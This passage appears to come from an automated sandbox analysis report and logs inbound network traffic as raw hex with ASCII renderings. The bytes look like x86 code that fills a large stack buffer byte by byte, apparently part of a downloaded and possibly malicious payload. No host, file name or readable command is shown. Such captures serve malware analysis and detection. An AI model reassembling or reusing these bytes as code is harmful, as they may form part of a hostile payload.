87 93 f9 ff ed c6 85 88 93 f9 ff c8 c6 85 89 93 f9 ff 5c c6 85 8a 93 f9 ff 24 c6 85 8b 93 f9 ff 85 c6 85 8c Data Ascii: hij@kvlzm`no<pCqbrosTtuyvjwrxyBz{[\|J}~2o5*h\$
2022-05-16 08:29:53 UTC	2989	IN	Data Raw: f9 ff 31 c6 85 8d 9c f9 ff 07 c6 85 8e 9c f9 ff 32 c6 85 8f 9c f9 ff 90 c6 85 90 9c f9 ff 35 c6 85 91 9c f9 ff 7a c6 85 92 9c f9 ff d0 c6 85 93 9c f9 ff fa c6 85 94 9c f9 ff 82 c6 85 95 9c f9 ff db c6 85 96 9c f9 ff 8f c6 85 97 9c f9 ff f9 c6 85 98 9c f9 ff 43 c6 85 99 9c f9 ff 90 c6 85 9a 9c f9 ff d8 c6 85 9b 9c f9 ff 9c c6 85 9c 9c f9 ff be c6 85 9d 9c f9 ff a3 c6 85 9e 9c f9 ff 98 c6 85 9f 9c f9 ff 1b c6 85 a0 9c f9 ff c6 c6 85 a1 9c f9 ff d6 c6 85 a2 9c f9 ff 5f c6 85 a3 9c f9 ff bc c6 85 a4 9c f9 ff 63 c6 85 a5 9c f9 ff ab c6 85 a6 9c f9 ff 0a c6 85 a7 9c f9 ff f6 c6 85 a8 9c f9 ff c5 c6 85 a9 9c f9 ff 5c c6 85 aa 9c f9 ff 20 c6 85 ab 9c f9 ff 39 c6 85 ac 9c f9 ff 8f c6 85 ad 9c f9 ff d7 c6 85 ae 9c f9 ff b0 c6 85 af 9c f9 ff 3e c6 85 b0 9c f9 ff 09 Data Ascii: 125zC_c\ 9>
2022-05-16 08:29:53 UTC	3005	IN	Data Raw: 85 b1 a5 f9 ff 53 c6 85 b2 a5 f9 ff 92 c6 85 b3 a5 f9 ff 3d c6 85 b4 a5 f9 ff fc c6 85 b5 a5 f9 ff dc c6 85 b6 a5 f9 ff 3e c6 85 b7 a5 f9 ff df c6 85 b8 a5 f9 ff 1c c6 85 b9 a5 f9 ff 67 c6 85 ba a5 f9 ff 3a c6 85 bb a5 f9 ff b9 c6 85 bc a5 f9 ff 82 c6 85 bd a5 f9 ff 5e c6 85 be a5 f9 ff c2 c6 85 bf a5 f9 ff 03 c6 85 c0 a5 f9 ff dc c6 85 c1 a5 f9 ff 09 c6 85 c2 a5 f9 ff 64 c6 85 c3 a5 f9 ff 41 c6 85 c4 a5 f9 ff d0 c6 85 c5 a5 f9 ff 6c c6 85 c6 a5 f9 ff 82 c6 85 c7 a5 f9 ff 0e c6 85 c8 a5 f9 ff c3 c6 85 c9 a5 f9 ff a4 c6 85 ca a5 f9 ff e1 c6 85 cb a5 f9 ff 7a c6 85 cc a5 f9 ff 50 c6 85 cd a5 f9 ff 64 c6 85 ce a5 f9 ff 4d c6 85 cf a5 f9 ff 5c c6 85 d0 a5 f9 ff 05 c6 85 d1 a5 f9 ff 35 c6 85 d2 a5 f9 ff 97 c6 85 d3 a5 f9 ff f8 c6 85 d4 a5 f9 ff 60 c6 85 d5 a5 Data Ascii: S=>g:^dAlzPdM\5`
2022-05-16 08:29:53 UTC	3021	IN	Data Raw: ff 94 c6 85 d6 ae f9 ff 5c c6 85 d7 ae f9 ff df c6 85 d8 ae f9 ff 82 c6 85 d9 ae f9 ff 74 c6 85 da ae f9 ff 8e c6 85 db ae f9 ff 8b c6 85 dc ae f9 ff c1 c6 85 dd ae f9 ff cd c6 85 de ae f9 ff db c6 85 df ae f9 ff 0d c6 85 e0 ae f9 ff 36 c6 85 e1 ae f9 ff 2f c6 85 e2 ae f9 ff 20 c6 85 e3 ae f9 ff ca c6 85 e4 ae f9 ff 61 c6 85 e5 ae f9 ff 06 c6 85 e6 ae f9 ff a5 c6 85 e7 ae f9 ff f2 c6 85 e8 ae f9 ff cd c6 85 e9 ae f9 ff db c6 85 ea ae f9 ff f2 c6 85 eb ae f9 ff fe c6 85 ec ae f9 ff 6b c6 85 ed ae f9 ff 82 c6 85 ee ae f9 ff 82 c6 85 ef ae f9 ff c8 c6 85 f0 ae f9 ff c2 c6 85 f1 ae f9 ff d6 c6 85 f2 ae f9 ff 90 c6 85 f3 ae f9 ff 54 c6 85 f4 ae f9 ff c6 c6 85 f5 ae f9 ff ab c6 85 f6 ae f9 ff 58 c6 85 f7 ae f9 ff 94 c6 85 f8 ae f9 ff 71 c6 85 f9 ae f9 ff f1 c6 Data Ascii: \t6/ akTXq
2022-05-16 08:29:53 UTC	3037	IN	Data Raw: fa b7 f9 ff 35 c6 85 fb b7 f9 ff 10 c6 85 fc b7 f9 ff 89 c6 85 fd b7 f9 ff 8d c6 85 fe b7 f9 ff 82 c6 85 ff b7 f9 ff 39 c6 85 00 b8 f9 ff 07 c6 85 01 b8 f9 ff 60 c6 85 02 b8 f9 ff a5 c6 85 03 b8 f9 ff d8 c6 85 04 b8 f9 ff 81 c6 85 05 b8 f9 ff 53 c6 85 06 b8 f9 ff ef c6 85 07 b8 f9 ff 3a c6 85 08 b8 f9 ff d4 c6 85 09 b8 f9 ff ce c6 85 0a b8 f9 ff 64 c6 85 0b b8 f9 ff 8b c6 85 0c b8 f9 ff 60 c6 85 0d b8 f9 ff 12 c6 85 0e b8 f9 ff 32 c6 85 0f b8 f9 ff f6 c6 85 10 b8 f9 ff 82 c6 85 11 b8 f9 ff 23 c6 85 12 b8 f9 ff c5 c6 85 13 b8 f9 ff 2b c6 85 14 b8 f9 ff ce c6 85 15 b8 f9 ff 53 c6 85 16 b8 f9 ff 30 c6 85 17 b8 f9 ff 3d c6 85 18 b8 f9 ff a5 c6 85 19 b8 f9 ff 64 c6 85 1a b8 f9 ff cd c6 85 1b b8 f9 ff 0e c6 85 1c b8 f9 ff be c6 85 1d b8 f9 ff a3 c6 85 1e b8 f9 Data Ascii: 59`S:d`2#+S0=d
2022-05-16 08:29:53 UTC	3053	IN	Data Raw: 43 c6 85 1f c1 f9 ff 09 c6 85 20 c1 f9 ff 50 c6 85 21 c1 f9 ff 20 c6 85 22 c1 f9 ff be c6 85 23 c1 f9 ff fe c6 85 24 c1 f9 ff 3a c6 85 25 c1 f9 ff d3 c6 85 26 c1 f9 ff db c6 85 27 c1 f9 ff 29 c6 85 28 c1 f9 ff c2 c6 85 29 c1 f9 ff e1 c6 85 2a c1 f9 ff 54 c6 85 2b c1 f9 ff 90 c6 85 2c c1 f9 ff 82 c6 85 2d c1 f9 ff 09 c6 85 2e c1 f9 ff 89 c6 85 2f c1 f9 ff a3 c6 85 30 c1 f9 ff d3 c6 85 31 c1 f9 ff 97 c6 85 32 c1 f9 ff 8f c6 85 33 c1 f9 ff 71 c6 85 34 c1 f9 ff 43 c6 85 35 c1 f9 ff 27 c6 85 36 c1 f9 ff 6f c6 85 37 c1 f9 ff ca c6 85 38 c1 f9 ff 1c c6 85 39 c1 f9 ff 01 c6 85 3a c1 f9 ff 8d c6 85 3b c1 f9 ff e0 c6 85 3c c1 f9 ff 97 c6 85 3d c1 f9 ff 8f c6 85 3e c1 f9 ff 8e c6 85 3f c1 f9 ff 8b c6 85 40 c1 f9 ff 63 c6 85 41 c1 f9 ff cd c6 85 42 c1 f9 ff 82 c6 85 Data Ascii: C P! "#$:%&')()*T+,-./0123q4C5'6o789:;<=>?@cAB
2022-05-16 08:29:53 UTC	3069	IN	Data Raw: ca f9 ff 0a c6 85 44 ca f9 ff 86 c6 85 45 ca f9 ff f2 c6 85 46 ca f9 ff da c6 85 47 ca f9 ff d1 c6 85 48 ca f9 ff 64 c6 85 49 ca f9 ff d8 c6 85 4a ca f9 ff 58 c6 85 4b ca f9 ff d0 c6 85 4c ca f9 ff 82 c6 85 4d ca f9 ff 53 c6 85 4e ca f9 ff 61 c6 85 4f ca f9 ff 6c c6 85 50 ca f9 ff fc c6 85 51 ca f9 ff 85 c6 85 52 ca f9 ff cd c6 85 53 ca f9 ff 39 c6 85 54 ca f9 ff 7a c6 85 55 ca f9 ff 67 c6 85 56 ca f9 ff 8d c6 85 57 ca f9 ff ca c6 85 58 ca f9 ff db c6 85 59 ca f9 ff 07 c6 85 5a ca f9 ff 93 c6 85 5b ca f9 ff 4f c6 85 5c ca f9 ff dc c6 85 5d ca f9 ff 81 c6 85 5e ca f9 ff 64 c6 85 5f ca f9 ff f6 c6 85 60 ca f9 ff 67 c6 85 61 ca f9 ff 3a c6 85 62 ca f9 ff 20 c6 85 63 ca f9 ff ac c6 85 64 ca f9 ff d6 c6 85 65 ca f9 ff 5f c6 85 66 ca f9 ff b0 c6 85 67 ca f9 ff Data Ascii: DEFGHdIJXKLMSNaOlPQRS9TzUgVWXYZ[O\]^d_`ga:b cde_fg
2022-05-16 08:29:53 UTC	3085	IN	Data Raw: c6 85 68 d3 f9 ff 82 c6 85 69 d3 f9 ff 34 c6 85 6a d3 f9 ff 14 c6 85 6b d3 f9 ff a4 c6 85 6c d3 f9 ff a5 c6 85 6d d3 f9 ff a1 c6 85 6e d3 f9 ff 4b c6 85 6f d3 f9 ff 82 c6 85 70 d3 f9 ff 36 c6 85 71 d3 f9 ff 61 c6 85 72 d3 f9 ff bc c6 85 73 d3 f9 ff e4 c6 85 74 d3 f9 ff 1f c6 85 75 d3 f9 ff 23 c6 85 76 d3 f9 ff 15 c6 85 77 d3 f9 ff 74 c6 85 78 d3 f9 ff 27 c6 85 79 d3 f9 ff cb c6 85 7a d3 f9 ff 0c c6 85 7b d3 f9 ff ab c6 85 7c d3 f9 ff d0 c6 85 7d d3 f9 ff 9e c6 85 7e d3 f9 ff 91 c6 85 7f d3 f9 ff 35 c6 85 80 d3 f9 ff c3 c6 85 81 d3 f9 ff 22 c6 85 82 d3 f9 ff 2b c6 85 83 d3 f9 ff 54 c6 85 84 d3 f9 ff 89 c6 85 85 d3 f9 ff c0 c6 85 86 d3 f9 ff 25 c6 85 87 d3 f9 ff 89 c6 85 88 d3 f9 ff 7e c6 85 89 d3 f9 ff 62 c6 85 8a d3 f9 ff e2 c6 85 8b d3 f9 ff 61 c6 85 8c Data Ascii: hi4jklmnKop6qarstu#vwtx'yz{\|}~5"+T%~ba
2022-05-16 08:29:53 UTC	3101	IN	Data Raw: f9 ff be c6 85 8d dc f9 ff 89 c6 85 8e dc f9 ff d4 c6 85 8f dc f9 ff b9 c6 85 90 dc f9 ff 64 c6 85 91 dc f9 ff c3 c6 85 92 dc f9 ff d7 c6 85 93 dc f9 ff bb c6 85 94 dc f9 ff 90 c6 85 95 dc f9 ff ab c6 85 96 dc f9 ff 97 c6 85 97 dc f9 ff 27 c6 85 98 dc f9 ff 94 c6 85 99 dc f9 ff 8d c6 85 9a dc f9 ff 1f c6 85 9b dc f9 ff 9b c6 85 9c dc f9 ff 30 c6 85 9d dc f9 ff a4 c6 85 9e dc f9 ff 2d c6 85 9f dc f9 ff d8 c6 85 a0 dc f9 ff cd c6 85 a1 dc f9 ff 53 c6 85 a2 dc f9 ff 1c c6 85 a3 dc f9 ff 6b c6 85 a4 dc f9 ff d4 c6 85 a5 dc f9 ff 97 c6 85 a6 dc f9 ff 97 c6 85 a7 dc f9 ff 6d c6 85 a8 dc f9 ff 06 c6 85 a9 dc f9 ff 12 c6 85 aa dc f9 ff 85 c6 85 ab dc f9 ff 85 c6 85 ac dc f9 ff ce c6 85 ad dc f9 ff 2d c6 85 ae dc f9 ff 43 c6 85 af dc f9 ff 77 c6 85 b0 dc f9 ff db Data Ascii: d'0-Skm-Cw
2022-05-16 08:29:53 UTC	3117	IN	Data Raw: 85 b1 e5 f9 ff 38 c6 85 b2 e5 f9 ff e2 c6 85 b3 e5 f9 ff 7a c6 85 b4 e5 f9 ff c5 c6 85 b5 e5 f9 ff 52 c6 85 b6 e5 f9 ff 55 c6 85 b7 e5 f9 ff db c6 85 b8 e5 f9 ff 9a c6 85 b9 e5 f9 ff 51 c6 85 ba e5 f9 ff 94 c6 85 bb e5 f9 ff 90 c6 85 bc e5 f9 ff cd c6 85 bd e5 f9 ff 34 c6 85 be e5 f9 ff 69 c6 85 bf e5 f9 ff a3 c6 85 c0 e5 f9 ff 8d c6 85 c1 e5 f9 ff b3 c6 85 c2 e5 f9 ff 11 c6 85 c3 e5 f9 ff d6 c6 85 c4 e5 f9 ff 4a c6 85 c5 e5 f9 ff 14 c6 85 c6 e5 f9 ff b4 c6 85 c7 e5 f9 ff ab c6 85 c8 e5 f9 ff 1f c6 85 c9 e5 f9 ff 5e c6 85 ca e5 f9 ff 12 c6 85 cb e5 f9 ff 5c c6 85 cc e5 f9 ff 35 c6 85 cd e5 f9 ff 91 c6 85 ce e5 f9 ff 58 c6 85 cf e5 f9 ff d7 c6 85 d0 e5 f9 ff a5 c6 85 d1 e5 f9 ff 96 c6 85 d2 e5 f9 ff de c6 85 d3 e5 f9 ff 35 c6 85 d4 e5 f9 ff be c6 85 d5 e5 Data Ascii: 8zRUQ4iJ^\5X5
2022-05-16 08:29:53 UTC	3133	IN	Data Raw: ff 45 c6 85 d6 ee f9 ff 03 c6 85 d7 ee f9 ff dc c6 85 d8 ee f9 ff 1b c6 85 d9 ee f9 ff 5b c6 85 da ee f9 ff e9 c6 85 db ee f9 ff 67 c6 85 dc ee f9 ff 27 c6 85 dd ee f9 ff 2f c6 85 de ee f9 ff 64 c6 85 df ee f9 ff 5e c6 85 e0 ee f9 ff d7 c6 85 e1 ee f9 ff ab c6 85 e2 ee f9 ff 0b c6 85 e3 ee f9 ff 09 c6 85 e4 ee f9 ff 71 c6 85 e5 ee f9 ff e9 c6 85 e6 ee f9 ff 07 c6 85 e7 ee f9 ff 6c c6 85 e8 ee f9 ff 97 c6 85 e9 ee f9 ff a6 c6 85 ea ee f9 ff 14 c6 85 eb ee f9 ff a4 c6 85 ec ee f9 ff f4 c6 85 ed ee f9 ff d2 c6 85 ee ee f9 ff 87 c6 85 ef ee f9 ff 64 c6 85 f0 ee f9 ff 58 c6 85 f1 ee f9 ff f4 c6 85 f2 ee f9 ff d2 c6 85 f3 ee f9 ff 35 c6 85 f4 ee f9 ff 82 c6 85 f5 ee f9 ff 50 c6 85 f6 ee f9 ff b7 c6 85 f7 ee f9 ff e1 c6 85 f8 ee f9 ff c9 c6 85 f9 ee f9 ff 8f c6 Data Ascii: E[g'/d^qldX5P
2022-05-16 08:29:53 UTC	3149	IN	Data Raw: fa f7 f9 ff 55 c6 85 fb f7 f9 ff 74 c6 85 fc f7 f9 ff 9b c6 85 fd f7 f9 ff 23 c6 85 fe f7 f9 ff 16 c6 85 ff f7 f9 ff cd c6 85 00 f8 f9 ff ce c6 85 01 f8 f9 ff a5 c6 85 02 f8 f9 ff e1 c6 85 03 f8 f9 ff 2f c6 85 04 f8 f9 ff 35 c6 85 05 f8 f9 ff 62 c6 85 06 f8 f9 ff b6 c6 85 07 f8 f9 ff 06 c6 85 08 f8 f9 ff b0 c6 85 09 f8 f9 ff 5a c6 85 0a f8 f9 ff 1a c6 85 0b f8 f9 ff db c6 85 0c f8 f9 ff e7 c6 85 0d f8 f9 ff 56 c6 85 0e f8 f9 ff bc c6 85 0f f8 f9 ff 82 c6 85 10 f8 f9 ff 97 c6 85 11 f8 f9 ff 60 c6 85 12 f8 f9 ff 15 c6 85 13 f8 f9 ff d6 c6 85 14 f8 f9 ff 85 c6 85 15 f8 f9 ff fc c6 85 16 f8 f9 ff 11 c6 85 17 f8 f9 ff ab c6 85 18 f8 f9 ff 4d c6 85 19 f8 f9 ff 3c c6 85 1a f8 f9 ff a6 c6 85 1b f8 f9 ff f1 c6 85 1c f8 f9 ff 4b c6 85 1d f8 f9 ff 22 c6 85 1e f8 f9 Data Ascii: Ut#/5bZV`M<K"
2022-05-16 08:29:53 UTC	3165	IN	Data Raw: 76 c6 85 1f 01 fa ff 8d c6 85 20 01 fa ff a9 c6 85 21 01 fa ff 41 c6 85 22 01 fa ff f8 c6 85 23 01 fa ff 60 c6 85 24 01 fa ff 8e c6 85 25 01 fa ff a0 c6 85 26 01 fa ff 7e c6 85 27 01 fa ff 53 c6 85 28 01 fa ff c4 c6 85 29 01 fa ff 42 c6 85 2a 01 fa ff 2b c6 85 2b 01 fa ff ce c6 85 2c 01 fa ff 4c c6 85 2d 01 fa ff f5 c6 85 2e 01 fa ff 9a c6 85 2f 01 fa ff 12 c6 85 30 01 fa ff 12 c6 85 31 01 fa ff 66 c6 85 32 01 fa ff 69 c6 85 33 01 fa ff 23 c6 85 34 01 fa ff d3 c6 85 35 01 fa ff 8e c6 85 36 01 fa ff 17 c6 85 37 01 fa ff 53 c6 85 38 01 fa ff 25 c6 85 39 01 fa ff 95 c6 85 3a 01 fa ff 72 c6 85 3b 01 fa ff 64 c6 85 3c 01 fa ff d8 c6 85 3d 01 fa ff a6 c6 85 3e 01 fa ff 69 c6 85 3f 01 fa ff a3 c6 85 40 01 fa ff dc c6 85 41 01 fa ff c0 c6 85 42 01 fa ff dd c6 85 Data Ascii: v !A"#`$%&~'S()B*++,L-./01f2i3#4567S8%9:r;d<=>i?@AB
2022-05-16 08:29:53 UTC	3181	IN	Data Raw: 0a fa ff 20 c6 85 44 0a fa ff 9e c6 85 45 0a fa ff 6e c6 85 46 0a fa ff d1 c6 85 47 0a fa ff d3 c6 85 48 0a fa ff fb c6 85 49 0a fa ff b9 c6 85 4a 0a fa ff 29 c6 85 4b 0a fa ff e1 c6 85 4c 0a fa ff 74 c6 85 4d 0a fa ff 00 c6 85 4e 0a fa ff 69 c6 85 4f 0a fa ff 09 c6 85 50 0a fa ff a9 c6 85 51 0a fa ff 33 c6 85 52 0a fa ff 38 c6 85 53 0a fa ff 97 c6 85 54 0a fa ff af c6 85 55 0a fa ff e1 c6 85 56 0a fa ff a8 c6 85 57 0a fa ff 27 c6 85 58 0a fa ff 4f c6 85 59 0a fa ff 5a c6 85 5a 0a fa ff f7 c6 85 5b 0a fa ff 01 c6 85 5c 0a fa ff ad c6 85 5d 0a fa ff 70 c6 85 5e 0a fa ff 7c c6 85 5f 0a fa ff 8f c6 85 60 0a fa ff ae c6 85 61 0a fa ff 1b c6 85 62 0a fa ff 88 c6 85 63 0a fa ff cd c6 85 64 0a fa ff a2 c6 85 65 0a fa ff 25 c6 85 66 0a fa ff 2e c6 85 67 0a fa ff Data Ascii: DEnFGHIJ)KLtMNiOPQ3R8STUVW'XOYZZ[\]p^\|_`abcde%f.g
2022-05-16 08:29:53 UTC	3197	IN	Data Raw: c6 85 68 13 fa ff 26 c6 85 69 13 fa ff b9 c6 85 6a 13 fa ff 9b c6 85 6b 13 fa ff d8 c6 85 6c 13 fa ff 73 c6 85 6d 13 fa ff a8 c6 85 6e 13 fa ff 7d c6 85 6f 13 fa ff 53 c6 85 70 13 fa ff 4a c6 85 71 13 fa ff 14 c6 85 72 13 fa ff 03 c6 85 73 13 fa ff 85 c6 85 74 13 fa ff e6 c6 85 75 13 fa ff 41 c6 85 76 13 fa ff 85 c6 85 77 13 fa ff 67 c6 85 78 13 fa ff a6 c6 85 79 13 fa ff b2 c6 85 7a 13 fa ff 24 c6 85 7b 13 fa ff 07 c6 85 7c 13 fa ff b8 c6 85 7d 13 fa ff 37 c6 85 7e 13 fa ff 23 c6 85 7f 13 fa ff 81 c6 85 80 13 fa ff 4f c6 85 81 13 fa ff 8e c6 85 82 13 fa ff 98 c6 85 83 13 fa ff 3a c6 85 84 13 fa ff 03 c6 85 85 13 fa ff 26 c6 85 86 13 fa ff 26 c6 85 87 13 fa ff 5f c6 85 88 13 fa ff aa c6 85 89 13 fa ff bf c6 85 8a 13 fa ff 60 c6 85 8b 13 fa ff 53 c6 85 8c Data Ascii: h&ijklsmn}oSpJqrstuAvwgxyz${\|}7~#O:&&_`S
2022-05-16 08:29:53 UTC	3213	IN	Data Raw: fa ff c3 c6 85 8d 1c fa ff a4 c6 85 8e 1c fa ff b0 c6 85 8f 1c fa ff 09 c6 85 90 1c fa ff 9c c6 85 91 1c fa ff 82 c6 85 92 1c fa ff 23 c6 85 93 1c fa ff c9 c6 85 94 1c fa ff 40 c6 85 95 1c fa ff 63 c6 85 96 1c fa ff f5 c6 85 97 1c fa ff eb c6 85 98 1c fa ff e9 c6 85 99 1c fa ff f3 c6 85 9a 1c fa ff cd c6 85 9b 1c fa ff 9c c6 85 9c 1c fa ff f0 c6 85 9d 1c fa ff 2c c6 85 9e 1c fa ff 3a c6 85 9f 1c fa ff c9 c6 85 a0 1c fa ff 6d c6 85 a1 1c fa ff b2 c6 85 a2 1c fa ff 29 c6 85 a3 1c fa ff 75 c6 85 a4 1c fa ff d7 c6 85 a5 1c fa ff d3 c6 85 a6 1c fa ff 63 c6 85 a7 1c fa ff 97 c6 85 a8 1c fa ff d9 c6 85 a9 1c fa ff 0e c6 85 aa 1c fa ff 94 c6 85 ab 1c fa ff 35 c6 85 ac 1c fa ff 1e c6 85 ad 1c fa ff e6 c6 85 ae 1c fa ff 9f c6 85 af 1c fa ff 74 c6 85 b0 1c fa ff ae Data Ascii: #@c,:m)uc5t
2022-05-16 08:29:53 UTC	3229	IN	Data Raw: 85 b1 25 fa ff dd c6 85 b2 25 fa ff 98 c6 85 b3 25 fa ff c3 c6 85 b4 25 fa ff 90 c6 85 b5 25 fa ff df c6 85 b6 25 fa ff 6c c6 85 b7 25 fa ff ab c6 85 b8 25 fa ff d0 c6 85 b9 25 fa ff 43 c6 85 ba 25 fa ff 68 c6 85 bb 25 fa ff 8d c6 85 bc 25 fa ff 58 c6 85 bd 25 fa ff ff c6 85 be 25 fa ff cc c6 85 bf 25 fa ff a4 c6 85 c0 25 fa ff 6a c6 85 c1 25 fa ff bc c6 85 c2 25 fa ff 31 c6 85 c3 25 fa ff 53 c6 85 c4 25 fa ff 5b c6 85 c5 25 fa ff 0f c6 85 c6 25 fa ff 28 c6 85 c7 25 fa ff 97 c6 85 c8 25 fa ff d0 c6 85 c9 25 fa ff 09 c6 85 ca 25 fa ff fa c6 85 cb 25 fa ff 12 c6 85 cc 25 fa ff c2 c6 85 cd 25 fa ff e1 c6 85 ce 25 fa ff 27 c6 85 cf 25 fa ff 7a c6 85 d0 25 fa ff d3 c6 85 d1 25 fa ff 03 c6 85 d2 25 fa ff 32 c6 85 d3 25 fa ff db c6 85 d4 25 fa ff 77 c6 85 d5 25 Data Ascii: %%%%%%l%%%C%h%%X%%%%j%%1%S%[%%(%%%%%%%%'%z%%%2%%w%
2022-05-16 08:29:53 UTC	3245	IN	Data Raw: ff fd c6 85 d6 2e fa ff 2f c6 85 d7 2e fa ff 05 c6 85 d8 2e fa ff a9 c6 85 d9 2e fa ff 5c c6 85 da 2e fa ff 70 c6 85 db 2e fa ff 06 c6 85 dc 2e fa ff 68 c6 85 dd 2e fa ff 17 c6 85 de 2e fa ff 27 c6 85 df 2e fa ff 63 c6 85 e0 2e fa ff 95 c6 85 e1 2e fa ff 24 c6 85 e2 2e fa ff 67 c6 85 e3 2e fa ff e4 c6 85 e4 2e fa ff ed c6 85 e5 2e fa ff 51 c6 85 e6 2e fa ff a0 c6 85 e7 2e fa ff 43 c6 85 e8 2e fa ff 48 c6 85 e9 2e fa ff 2c c6 85 ea 2e fa ff f5 c6 85 eb 2e fa ff 09 c6 85 ec 2e fa ff ee c6 85 ed 2e fa ff db c6 85 ee 2e fa ff df c6 85 ef 2e fa ff c6 c6 85 f0 2e fa ff a4 c6 85 f1 2e fa ff 50 c6 85 f2 2e fa ff 4f c6 85 f3 2e fa ff c1 c6 85 f4 2e fa ff 22 c6 85 f5 2e fa ff b2 c6 85 f6 2e fa ff 54 c6 85 f7 2e fa ff 72 c6 85 f8 2e fa ff ff c6 85 f9 2e fa ff c1 c6 Data Ascii: ./...\.p..h..'.c..$.g...Q..C.H.,........P.O.."..T.r..
2022-05-16 08:29:53 UTC	3261	IN	Data Raw: fa 37 fa ff c2 c6 85 fb 37 fa ff 20 c6 85 fc 37 fa ff 5b c6 85 fd 37 fa ff fc c6 85 fe 37 fa ff c6 c6 85 ff 37 fa ff 46 c6 85 00 38 fa ff c5 c6 85 01 38 fa ff c5 c6 85 02 38 fa ff 3e c6 85 03 38 fa ff fc c6 85 04 38 fa ff 9b c6 85 05 38 fa ff 92 c6 85 06 38 fa ff 98 c6 85 07 38 fa ff be c6 85 08 38 fa ff 97 c6 85 09 38 fa ff f7 c6 85 0a 38 fa ff 7e c6 85 0b 38 fa ff f1 c6 85 0c 38 fa ff 84 c6 85 0d 38 fa ff 3f c6 85 0e 38 fa ff 1d c6 85 0f 38 fa ff 85 c6 85 10 38 fa ff 17 c6 85 11 38 fa ff ff c6 85 12 38 fa ff b1 c6 85 13 38 fa ff a3 c6 85 14 38 fa ff 42 c6 85 15 38 fa ff ae c6 85 16 38 fa ff 6b c6 85 17 38 fa ff 07 c6 85 18 38 fa ff 27 c6 85 19 38 fa ff 7a c6 85 1a 38 fa ff 20 c6 85 1b 38 fa ff d8 c6 85 1c 38 fa ff d0 c6 85 1d 38 fa ff 74 c6 85 1e 38 fa Data Ascii: 77 7[777F888>88888888~888?8888888B88k88'8z8 888t8
2022-05-16 08:29:53 UTC	3277	IN	Data Raw: 71 c6 85 1f 41 fa ff 74 c6 85 20 41 fa ff ea c6 85 21 41 fa ff 4a c6 85 22 41 fa ff 24 c6 85 23 41 fa ff f2 c6 85 24 41 fa ff 1d c6 85 25 41 fa ff a8 c6 85 26 41 fa ff df c6 85 27 41 fa ff 35 c6 85 28 41 fa ff 4a c6 85 29 41 fa ff 81 c6 85 2a 41 fa ff 5a c6 85 2b 41 fa ff 0d c6 85 2c 41 fa ff e6 c6 85 2d 41 fa ff 5c c6 85 2e 41 fa ff 0d c6 85 2f 41 fa ff 01 c6 85 30 41 fa ff 40 c6 85 31 41 fa ff 05 c6 85 32 41 fa ff 7d c6 85 33 41 fa ff 37 c6 85 34 41 fa ff e9 c6 85 35 41 fa ff 51 c6 85 36 41 fa ff 6f c6 85 37 41 fa ff ab c6 85 38 41 fa ff ed c6 85 39 41 fa ff 2c c6 85 3a 41 fa ff a7 c6 85 3b 41 fa ff 6b c6 85 3c 41 fa ff 5a c6 85 3d 41 fa ff 76 c6 85 3e 41 fa ff a1 c6 85 3f 41 fa ff 75 c6 85 40 41 fa ff 9b c6 85 41 41 fa ff d3 c6 85 42 41 fa ff 90 c6 85 Data Ascii: qAt A!AJ"A$#A$A%A&A'A5(AJ)A*AZ+A,A-A\.A/A0A@1A2A}3A74A5AQ6Ao7A8A9A,:A;Ak<AZ=Av>A?Au@AAABA
2022-05-16 08:29:53 UTC	3293	IN	Data Raw: 4a fa ff 39 c6 85 44 4a fa ff 07 c6 85 45 4a fa ff 60 c6 85 46 4a fa ff a5 c6 85 47 4a fa ff d8 c6 85 48 4a fa ff 81 c6 85 49 4a fa ff 53 c6 85 4a 4a fa ff ef c6 85 4b 4a fa ff 3a c6 85 4c 4a fa ff d4 c6 85 4d 4a fa ff ce c6 85 4e 4a fa ff 64 c6 85 4f 4a fa ff 8b c6 85 50 4a fa ff 60 c6 85 51 4a fa ff 12 c6 85 52 4a fa ff 32 c6 85 53 4a fa ff f6 c6 85 54 4a fa ff 82 c6 85 55 4a fa ff 23 c6 85 56 4a fa ff c5 c6 85 57 4a fa ff 2b c6 85 58 4a fa ff ce c6 85 59 4a fa ff 53 c6 85 5a 4a fa ff 30 c6 85 5b 4a fa ff 3d c6 85 5c 4a fa ff a5 c6 85 5d 4a fa ff 64 c6 85 5e 4a fa ff cd c6 85 5f 4a fa ff 0e c6 85 60 4a fa ff be c6 85 61 4a fa ff a3 c6 85 62 4a fa ff c9 c6 85 63 4a fa ff 68 c6 85 64 4a fa ff 0a c6 85 65 4a fa ff 30 c6 85 66 4a fa ff 31 c6 85 67 4a fa ff Data Ascii: J9DJEJ`FJGJHJIJSJJKJ:LJMJNJdOJPJ`QJRJ2SJTJUJ#VJWJ+XJYJSZJ0[J=\J]Jd^J_J`JaJbJcJhdJeJ0fJ1gJ
2022-05-16 08:29:53 UTC	3309	IN	Data Raw: c6 85 68 53 fa ff 7d c6 85 69 53 fa ff 48 c6 85 6a 53 fa ff 27 c6 85 6b 53 fa ff d6 c6 85 6c 53 fa ff 85 c6 85 6d 53 fa ff 7a c6 85 6e 53 fa ff a8 c6 85 6f 53 fa ff 6f c6 85 70 53 fa ff c5 c6 85 71 53 fa ff 92 c6 85 72 53 fa ff 75 c6 85 73 53 fa ff 5c c6 85 74 53 fa ff 94 c6 85 75 53 fa ff 0c c6 85 76 53 fa ff 73 c6 85 77 53 fa ff 8e c6 85 78 53 fa ff 04 c6 85 79 53 fa ff bc c6 85 7a 53 fa ff 93 c6 85 7b 53 fa ff 35 c6 85 7c 53 fa ff 5b c6 85 7d 53 fa ff 9a c6 85 7e 53 fa ff 71 c6 85 7f 53 fa ff 1f c6 85 80 53 fa ff d0 c6 85 81 53 fa ff 14 c6 85 82 53 fa ff 72 c6 85 83 53 fa ff 74 c6 85 84 53 fa ff 24 c6 85 85 53 fa ff 56 c6 85 86 53 fa ff 7e c6 85 87 53 fa ff 4a c6 85 88 53 fa ff 82 c6 85 89 53 fa ff 65 c6 85 8a 53 fa ff 7e c6 85 8b 53 fa ff f1 c6 85 8c Data Ascii: hS}iSHjS'kSlSmSznSoSopSqSrSusS\tSuSvSswSxSySzS{S5\|S[}S~SqSSSSrStS$SVS~SJSSeS~S
